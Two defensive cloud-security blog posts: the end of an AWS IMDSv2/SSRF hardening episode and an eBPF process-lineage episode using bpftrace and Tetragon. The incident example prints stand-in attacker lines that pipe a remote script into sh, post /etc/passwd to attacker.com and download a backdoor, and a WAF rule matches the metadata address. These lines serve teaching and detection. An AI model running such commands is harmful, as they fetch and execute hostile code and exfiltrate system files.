    lastSeen: .Service.EventLastSeen
  }'

A second finding to watch:

Recon:IAMUser/UserPermissions — fires when the stolen credentials are used to enumerate IAM permissions (the iam:SimulatePrincipalPolicy call from the attacker’s Step 4 above). Often appears immediately before the data exfiltration events.

VPC Flow Logs: Connections to 169.254.169.254

VPC Flow Logs do not capture traffic to the IMDS endpoint by default — but they can capture egress from EC2 instances in ways that reveal post-exploitation. More useful for IMDS abuse is querying for unexpected source IPs calling the IMDS from within the VPC:

# Athena query against VPC flow logs
# Find: connections to 169.254.169.254 from unexpected source IPs
# (useful in containerized environments where only the instance itself should call IMDS)

SELECT
  srcaddr,
  dstaddr,
  srcport,
  dstport,
  protocol,
  packets,
  bytes,
  action,
  log_status,
  from_unixtime(start) as start_time
FROM vpc_flow_logs
WHERE
  dstaddr = '169.254.169.254'
  AND action = 'ACCEPT'
  AND from_unixtime(start) > current_timestamp - interval '24' hour
ORDER BY start_time DESC;

If you see source IPs in this query that are not your EC2 instance’s primary private IP — for example, container IPs within the pod CIDR — and you have --http-put-response-hop-limit 1 set, those requests should be failing. If they’re succeeding, the hop limit is not enforced.

IMDSv2 Hop Limit: Why It Blocks Containerized Attacks

The hop limit is a separate defense from the token requirement. With --http-put-response-hop-limit 1, the PUT request to obtain an IMDSv2 token has a TTL of 1. When a process running inside a container tries to reach the IMDS, the request must traverse:

Container network namespace → veth pair → host network namespace → hypervisor IMDS endpoint

That traversal decrements the TTL below 1, and the PUT request never reaches the IMDS endpoint. The token is never issued. The GET request that follows has no token and — if --http-tokens required is also set — is rejected.

Hop limit = 1:
  Container → veth → [TTL=0, packet dropped]
  IMDS never receives the PUT, never issues a token

Hop limit = 2 (required for EKS with IMDS access):
  Container → veth → host → IMDS
  Token is issued; GET with token succeeds
  ← Use this only when container workloads legitimately need IMDS

For EKS specifically: use hop limit 2 only on nodes where pods have a legitimate need to call IMDS (rare). The preferred approach is pod-level identity via OIDC workload identity eliminates static credentials — pods get short-lived tokens scoped to their service account, not the node’s IAM role.

Purple Phase: Structural Fixes

Fix 1: Enforce IMDSv2 — The Non-Negotiable Control

This is not optional. Every EC2 instance running production workloads should have --http-tokens required. The operational cost is near zero; the risk reduction is complete for the SSRF-to-IMDS credential chain.

# Enforce IMDSv2 on a running instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Verify the change took effect
aws ec2 describe-instances \
  --instance-ids i-1234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'
# "HttpTokens": "required" confirms IMDSv2 is enforced

# Enforce IMDSv2 in a launch template (all new instances launched from this template)
aws ec2 create-launch-template-version \
  --launch-template-id lt-0abcdef1234567890 \
  --source-version '$Latest' \
  --launch-template-data '{
    "MetadataOptions": {
      "HttpTokens": "required",
      "HttpPutResponseHopLimit": 1,
      "HttpEndpoint": "enabled"
    }
  }'

# Set this new version as the default
aws ec2 modify-launch-template \
  --launch-template-id lt-0abcdef1234567890 \
  --default-version '$Latest'

# Bulk remediation: enforce IMDSv2 on all instances in a region where
# HttpTokens is currently "optional"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens==`optional`].InstanceId' \
  --output text | \
  tr '\t' '\n' | \
  while read instance_id; do
    echo "Enforcing IMDSv2 on: $instance_id"
    aws ec2 modify-instance-metadata-options \
      --instance-id "$instance_id" \
      --http-tokens required \
      --http-put-response-hop-limit 1
  done

Fix 2: SCP to Block IMDSv1 Org-Wide

An SCP prevents any account in your organization from launching instances with IMDSv1 enabled, and blocks modification of existing instances to re-enable it. This is the org-level control that makes IMDSv2 enforcement durable — individual account teams can’t accidentally revert it.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RequireIMDSv2OnNewInstances",
      "Effect": "Deny",
      "Action": "ec2:RunInstances",
      "Resource": "arn:aws:ec2:*:*:instance/*",
      "Condition": {
        "StringNotEquals": {
          "ec2:MetadataHttpTokens": "required"
        }
      }
    },
    {
      "Sid": "DenyIMDSv1ReEnablement",
      "Effect": "Deny",
      "Action": "ec2:ModifyInstanceMetadataOptions",
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "ec2:MetadataHttpTokens": "optional"
        }
      }
    }
  ]
}

Apply this SCP to all OUs except the management account. New ec2:RunInstances calls that don’t include MetadataOptions.HttpTokens=required will be denied. Existing instances can be remediated with the bulk script above; once remediated, the second statement prevents reverting.

Fix 3: OIDC Workload Identity — Eliminate the Credential Entirely

Enforcing IMDSv2 removes the SSRF-to-IMDS path. OIDC workload identity eliminates static credentials removes the entire credential from the picture — there is no long-lived IAM role credential attached to the instance, so there is nothing for SSRF to retrieve.

For Kubernetes workloads on EKS: use IAM Roles for Service Accounts (IRSA) or EKS Pod Identity. The pod’s service account is bound to an IAM role via OIDC. The pod gets short-lived, automatically rotated credentials scoped to that specific role. The node’s instance profile requires no IAM permissions for application workloads.

# EKS Pod Identity: associate a service account with an IAM role
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace my-app \
  --service-account my-app-sa \
  --role-arn arn:aws:iam::123456789012:role/my-app-role

# The pod receives credentials via a projected volume token, not IMDS
# Even if an attacker gets SSRF inside the pod, IMDS has no useful credentials for them
# The most they get: instance metadata (instance ID, AMI, AZ) — not IAM credentials

Fix 4: Restrict SSRF at the Network and Application Layer

IMDSv2 enforcement is the primary control. Defence in depth adds:

# WAF rule (AWS WAF): block requests where the URL contains the IMDS address
# This catches simple SSRF attempts at the perimeter before they reach your app
# Deploy as a managed rule group or custom rule:

# AWS CLI: create a WAF rule to block IMDS-targeting SSRFs
aws wafv2 create-rule-group \
  --name "BlockSSRFToIMDS" \
  --scope REGIONAL \
  --capacity 10 \
  --rules '[
    {
      "Name": "BlockIMDSAccess",
      "Priority": 0,
      "Statement": {
        "ByteMatchStatement": {
          "SearchString": "169.254.169.254",
          "FieldToMatch": {"QueryString": {}},
          "TextTransformations": [{"Priority": 0, "Type": "NONE"}],
          "PositionalConstraint": "CONTAINS"
        }
      },
      "Action": {"Block": {}},
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "BlockIMDSAccess"
      }
    }
  ]' \
  --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=BlockSSRFToIMDS

# Egress filtering: block EC2 instances from making outbound requests
# to the IMDS address from application code (defense in depth via iptables)
# This only applies if your application runs as a non-root user
# Root processes bypass this — it is a secondary control, not primary

# On the EC2 instance, block application user (uid 1001) from reaching IMDS
iptables -A OUTPUT \
  -m owner --uid-owner 1001 \
  -d 169.254.169.254 \
  -j REJECT \
  --reject-with icmp-port-unreachable

# Only the instance's AWS SDK calls (typically running as a system service with different uid)
# should need IMDS access — scope accordingly

Note: iptables-based egress filtering is a secondary control. A root process, or any process with CAP_NET_ADMIN, can bypass or modify these rules. The primary control remains IMDSv2 enforcement.

⚠ Production Gotchas

Legacy AWS SDK versions that only support IMDSv1. AWS SDK for Java v1 and Python (boto3 < 1.9.220) do not support IMDSv2 by default. Enforcing --http-tokens required on an instance running a legacy SDK will break credential refresh for the running application. Before enforcing IMDSv2 on a running instance, verify the SDK version used by all processes that call IMDS. Upgrade the SDK if needed; then enforce IMDSv2. The AWS Config rule ec2-imdsv2-check flags non-compliant instances but does not check SDK versions — that inventory step is manual.

# Check boto3 version on an instance
python3 -c "import boto3; print(boto3.__version__)"
# Requires >= 1.9.220 for IMDSv2 support

# Check AWS SDK for Java via jar manifest (if applicable)
find /opt /app -name "aws-java-sdk-core-*.jar" 2>/dev/null | \
  while read jar; do
    unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | grep "Implementation-Version"
  done
# AWS SDK for Java v1 < 1.11.678 does not support IMDSv2 by default

EKS node groups and hop limit 2. If you run EKS and pods need to use IRSA (IAM Roles for Service Accounts), the pods themselves do not use IMDS — they use a projected service account token. You should be safe with hop limit 1 on EKS nodes in most cases. However, if you have DaemonSets or system components that fetch instance metadata directly (some cluster autoscaler versions, node monitoring agents), hop limit 1 will break them. Audit which processes on your nodes actually call IMDS before setting hop limit 1 on EKS. The aws eks create-managed-node-group default is hop limit 2 for this reason; you can reduce it once you’ve confirmed nothing breaks.

GuardDuty’s 5–15 minute detection delay. UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration is not a real-time control. GuardDuty aggregates events and applies ML-based anomaly detection — the finding typically appears 5 to 15 minutes after the first anomalous API call. A credential with broad S3 permissions can exfiltrate a significant volume of data in that window. GuardDuty detects the breach; it does not prevent the initial exfiltration. Pair it with: IAM permission boundaries that scope the blast radius, and S3 data events in CloudTrail with real-time EventBridge rules for high-sensitivity buckets.

# EventBridge rule: alert immediately on S3 data events from unexpected sources
# (complements GuardDuty's delayed finding)
aws events put-rule \
  --name "S3DataEventFromUnexpectedSource" \
  --event-pattern '{
    "source": ["aws.s3"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {
      "eventSource": ["s3.amazonaws.com"],
      "eventName": ["GetObject"],
      "userIdentity": {
        "sessionContext": {
          "sessionIssuer": {
            "userName": ["MyApplicationRole"]
          }
        }
      }
    }
  }' \
  --state ENABLED

Disabling the IMDS endpoint entirely. You can set --http-endpoint disabled to turn off IMDS access altogether. Do this only on instances where you are certain no running process needs instance metadata. ECS and EKS managed nodes need IMDS for node registration and credential delivery to the container agent. Application-only EC2 instances that use OIDC/IRSA and have no SDK calls to IMDS are candidates for full endpoint disablement.

Quick Reference

IMDSv1 vs IMDSv2

Attribute	IMDSv1	IMDSv2
Authentication	None — any HTTP GET works	PUT to `/latest/api/token` required first to obtain a session token
SSRF exploitable	Yes — one HTTP request returns credentials	No — SSRF cannot initiate a PUT before a GET in standard flows
Session token TTL	N/A	1 second to 21,600 seconds (configurable)
Hop limit enforcement	N/A	Enforced on PUT — TTL=1 blocks containers from reaching IMDS
AWS CLI enforcement	`--http-tokens optional` (default on old instances)	`--http-tokens required`
Capital One risk	Present	Eliminated

IMDSv2 Enforcement Commands by Provider

Provider	Enforcement Command	Scope
AWS — running instance	`aws ec2 modify-instance-metadata-options --instance-id i-xxx --http-tokens required --http-put-response-hop-limit 1`	Single instance
AWS — launch template	Add `"MetadataOptions": {"HttpTokens": "required"}` to launch template data	All instances from template
AWS — org SCP	Deny `ec2:RunInstances` where `ec2:MetadataHttpTokens != required`	All accounts in org
AWS — Config rule	`ec2-imdsv2-check` managed rule	Compliance audit
GCP	GCP does not have an unauthenticated IMDS equivalent; Metadata Server requires `Metadata-Flavor: Google` header — this header cannot be set via SSRF in most frameworks	N/A
Azure	Azure IMDS requires `Metadata: true` header — browser/SSRF requests typically cannot set this; additionally, IMDS returns only non-credential metadata by default (credentials via Managed Identity have their own endpoint with additional controls)	N/A

Note on GCP and Azure: Both providers designed their metadata services with SSRF resistance in mind. The Metadata-Flavor: Google and Metadata: true headers must be explicitly set by the calling code — they are not added by default browser or curl requests. This does not make SSRF harmless on GCP/Azure (other metadata is still exposed), but the credential exfiltration path is harder than IMDSv1.

Key Takeaways

IMDSv1 has no authentication: any SSRF in any process running on an EC2 instance — application code, WAF, sidecar, proxy — is sufficient to retrieve the full IAM role credentials; no privilege escalation required
The Capital One breach was not a novel attack: it was a well-known SSRF-to-IMDS chain that had been documented for years before 2019; the industry was slow to enforce IMDSv2 at scale
--http-tokens required is the complete fix for the SSRF-to-IMDS credential chain; the operational cost is near zero; every production EC2 instance should have it; use an SCP to make it org-wide and durable
GuardDuty’s UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration finding is your primary post-exploitation signal but fires 5–15 minutes after the fact — pair it with IAM permission boundaries to limit blast radius and EventBridge rules on S3 data events for real-time alerting
The structural solution eliminates the credential entirely: OIDC workload identity eliminates static credentials on EKS/GKE means pods get scoped, short-lived tokens; the node’s instance role carries no application permissions; even a successful SSRF-to-IMDS attack yields nothing useful

What’s Next

SSRF gets you IAM credentials. But if the attacker is already inside a container — even a legitimate one — the path to the host is different. The credential-theft chain doesn’t apply when the attacker already has code execution inside a pod. EP08 covers Kubernetes container escape: hostPID, hostNetwork, privileged containers, and the kernel-level paths that take an attacker from container to node. The detection angle is where eBPF enters the picture — syscall-level visibility that catches escape attempts before they complete.

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

Process Lineage — Reconstructing What Happened After the Fact

July 6, 2026June 18, 2026 by Vamshi Krishna Santhapuri

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 13
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability · LSM and Tetragon · Process Lineage

TL;DR

Process lineage with eBPF hooks fork and exec at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp
(kprobe on fork/exec = an eBPF program that fires every time the kernel’s fork() or execve() system call runs, capturing process name, PID, parent PID, and arguments before any userspace observer could be bypassed)
Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot
The kernel’s task_struct contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)
Tetragon and Falco both build process lineage from kernel events; the difference is storage — Tetragon persists a kernel-side cache of the process tree in BPF maps, Falco reconstructs lineage from an audit log stream
Reconstructing an incident from process lineage requires: who spawned the attacker’s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp
Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace

EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.

Quick Check: What Process Events Is Your Cluster Already Recording?

# On any cluster node — verify exec tracing is available
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%-20s %-6d %s\n", comm, pid, str(args->filename));
}' --timeout 10

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy

# If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20

Sample Tetragon output:

{
  "process_exec": {
    "process": {
      "pid": 18293,
      "binary": "/bin/sh",
      "arguments": "-c health-check.sh",
      "start_time": "2026-04-22T09:14:03.412Z",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "parent_pid": 18201
    },
    "parent": {
      "pid": 18201,
      "binary": "/usr/local/bin/my-app",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"}
    }
  }
}

Each event has the process, its parent, the pod, the namespace, and the full binary path. That’s the raw material for process lineage reconstruction.

Not running Tetragon? Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the /proc/<pid>/cgroup mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.

A container in the payments namespace was reported compromised. The security team’s automated response had already restarted the pod — the attacker’s process was gone. The container’s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.

Three questions, no answers yet:
1. What spawned the attacker’s process? (was it a remote code execution in the app, or a misconfigured exec?)
2. What did the attacker run after getting in? (what did they download, execute, touch?)
3. What network connections did they make? (where did data go, if anywhere?)

The answers were in Tetragon’s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn’t touch that record.

The lineage showed:

my-app (PID 18201)
  └── sh -c "curl http://attacker.com/payload.sh | sh"  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              └── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
                    └── chmod +x /tmp/.x  (PID 18298)

Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.

How the Kernel Tracks Process Identity

Every process in Linux is represented by a task_struct — the kernel’s internal data structure for a running process. It contains everything the kernel knows about that process.

task_struct — the kernel’s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent task_struct. When bpftrace uses curtask, it’s returning a pointer to the current process’s task_struct. Reading curtask->real_parent->tgid gives you the parent’s PID — the foundation of process lineage.

When a process calls fork(), the kernel:
1. Allocates a new task_struct for the child
2. Copies the parent’s task_struct fields into the child
3. Sets the child’s real_parent pointer to the parent’s task_struct
4. Assigns the child a new PID
5. Returns the child’s PID to the parent, and 0 to the child

When the child calls execve(), the kernel:
1. Validates the binary (verifier/capability checks, LSM hooks)
2. Replaces the process’s memory image with the new binary
3. Updates task_struct->comm with the new process name
4. The PID does not change — execve replaces the process image but not the process identity

This fork → exec sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.

Building the Process Tree with kprobes

The two core hooks for process lineage:

# Every fork — capture parent/child relationship
bpftrace -e '
tracepoint:syscalls:sys_exit_clone {
    if (retval > 0) {
        # retval is the child PID (from parent's perspective)
        printf("FORK parent=%-6d child=%-6d parent_comm=%-20s\n",
               pid, retval, comm);
    }
}'

# Every exec — capture what binary replaced the process image
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("EXEC pid=%-6d ppid=%-6d binary=%-40s args=%s\n",
           pid,
           curtask->real_parent->tgid,
           str(args->filename),
           str(*args->argv));
}'

Combined output (30 seconds, simplified):

FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd

Each line is a kernel event. The parent/child PID chain is the tree. Rendered:

my-app (18201)
  └── sh (18293) — "sh -c curl http://attacker.com/payload.sh | sh"
        └── sh (18294) — "sh payload.sh"
              ├── cat (18295) — "/etc/passwd"
              └── curl (18296) — "http://attacker.com/exfil -d @/etc/passwd"

This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.

How Tetragon Stores the Process Tree in BPF Maps

bpftrace’s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.

Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend

task_struct in BPF maps — Tetragon doesn’t store the raw task_struct pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.

To inspect Tetragon’s process cache directly:

# Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     "key": 18293,                           # ← PID
#     "value": {
#         "binary": "/bin/sh",
#         "args": "sh -c curl http://...",
#         "pid": 18293,
#         "ppid": 18201,
#         "uid": 1000,
#         "start_time": 1745296443,
#         "cgroup": "kubepods/burstable/pod3f8a21bc/.../payments"
#     }
# }]

The cgroup field maps directly to the pod — same path as /proc/<pid>/cgroup but captured at exec time and stored in kernel space.

Correlating Files and Connections to the Process Tree

Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon’s TracingPolicy supports this multi-event correlation natively:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: "NotIn"
              values: ["1"]    # exclude host network namespace
          matchActions:
            - action: Post   # audit: log but don't block
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchActions:
            - action: Post

With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:

tetra getevents | jq 'select(.process_kprobe.function_name == "tcp_connect") |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}'

Sample output:

{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}
{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}

PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the curl and wget spawned by the attacker’s payload script. The destination IP is the attacker’s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.

Building Process Lineage Without Tetragon

If you’re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:

# Record all exec events to a file — run in the background on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%llu EXEC pid=%-6d ppid=%-6d binary=%s\n",
           nsecs, pid, curtask->real_parent->tgid, str(args->filename));
}
tracepoint:sched:sched_process_exit {
    printf("%llu EXIT pid=%-6d comm=%s\n", nsecs, pid, comm);
}
' > /var/log/process-lineage.log &

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log

Sample output:

1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh

This file survives pod restarts because it’s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by ppid and ordering by timestamp.

⚠ Production Gotchas

Ringbuf saturation on high-process-churn nodes. Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon’s namespace selector does this filtering in the eBPF program before the write.

The 15-character comm truncation. The comm field in task_struct is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. bpftrace‘s comm built-in has the same limit. For the full binary path, read from execve‘s filename argument at the tracepoint, not from comm.

PID reuse. Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon’s process cache keys on PID + start time to handle this.

Exec chains lose argument history. When execve replaces the process image, task_struct->comm changes but the PID does not. If the attacker’s shell runs exec bash to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don’t rely on comm alone for process identity; always track the binary path from the exec event.

Process events don’t capture file content. You see that /bin/cat /etc/passwd ran. You don’t see what was in /etc/passwd at that moment unless you also capture file open/read events. Tetragon’s security_inode_permission hook tells you which files were accessed; capturing their content requires additional hooks on vfs_read with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.

Quick Reference

What you want	Command
Live exec trace (bpftrace)	`bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf(...) }'`
Fork + exec tree	Combine `sys_exit_clone` + `sys_enter_execve` traces, correlate by pid/ppid
Tetragon process events	`tetra getevents --event-types PROCESS_EXEC`
Tetragon file + network	`tetra getevents --event-types PROCESS_KPROBE`
Process cache map	`bpftool map list \| grep process_cache` → `bpftool map dump id N`
Map PID to pod	`cat /proc/<pid>/cgroup` → extract pod UID
Process exit events	`tracepoint:sched:sched_process_exit`

Process event	Kernel hook
New process spawned	`tracepoint:syscalls:sys_exit_clone` (retval > 0 = child PID)
Binary executed	`tracepoint:syscalls:sys_enter_execve`
Process exited	`tracepoint:sched:sched_process_exit`
File opened	`tracepoint:syscalls:sys_enter_openat`
Network connect	`kprobe:tcp_connect`
DNS query	`tracepoint:syscalls:sys_enter_sendto` (port 53)

Key Takeaways

Process lineage with eBPF hooks fork and exec at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs
The kernel’s task_struct is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed
Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted
Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism
PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events
Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls

What’s Next

EP14 is the payoff episode for the entire series arc so far. You’ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).

EP14 synthesises all of it into four commands that tell you everything about any cluster you’ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what’s enforcing policy at the kernel level before you can trust anything it tells you.

Next: the audit playbook — four commands to see any cluster

Get EP14 in your inbox when it publishes → linuxcent.com/subscribe